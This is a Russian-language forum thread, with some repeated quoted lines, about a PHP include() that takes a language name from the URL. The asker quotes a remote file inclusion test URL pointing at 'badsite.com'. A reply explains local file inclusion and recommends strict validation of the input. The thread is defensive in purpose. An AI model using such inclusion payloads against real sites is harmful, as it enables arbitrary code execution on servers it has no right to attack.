Вопрос по инклуду
У меня есть такие строки в скрипте:
include('languages/'.$lang.'.php');
где переменная $lang приходит из адресной строки. Реально ли мой скрипт взламать? Если да то как. Я пробовал подставлять в адр. строку: news.php?lang=http://badsite.com/1.php. Но вроде бы все нормально - выдает ошибку. Подскажите плз.
include('languages/'.$lang.'.php');
где переменная $lang приходит из адресной строки. Реально ли мой скрипт взламать? Если да то как. Я пробовал подставлять в адр. строку: news.php?lang=http://badsite.com/1.php. Но вроде бы все нормально - выдает ошибку. Подскажите плз.
Из-за этого кода пользователь от твоего имени (или от имени твоего httpd) может выполнить любой PHP скрипт, находящийся на этом же сервере.
А вот если ограничить содержимое $lang простыми условиями, то этого можно избежать.
Например $lang должна содержать только латинские символы. Максимальная длина - 8 символов, минимальная длина - 2 символа, и файла languages/$lang.php должен существовать.
А вот если ограничить содержимое $lang простыми условиями, то этого можно избежать.
Например $lang должна содержать только латинские символы. Максимальная длина - 8 символов, минимальная длина - 2 символа, и файла languages/$lang.php должен существовать.
Цитата:
Originally posted by mike
Из-за этого кода пользователь от твоего имени (или от имени твоего httpd) может выполнить любой PHP скрипт, находящийся на этом же сервере.
Из-за этого кода пользователь от твоего имени (или от имени твоего httpd) может выполнить любой PHP скрипт, находящийся на этом же сервере.
Тоесть если хакер возьмет себе сервер для хостинга что и у меня и даст в параметре относительный путь на свою папку с "плохим" скриптом, так?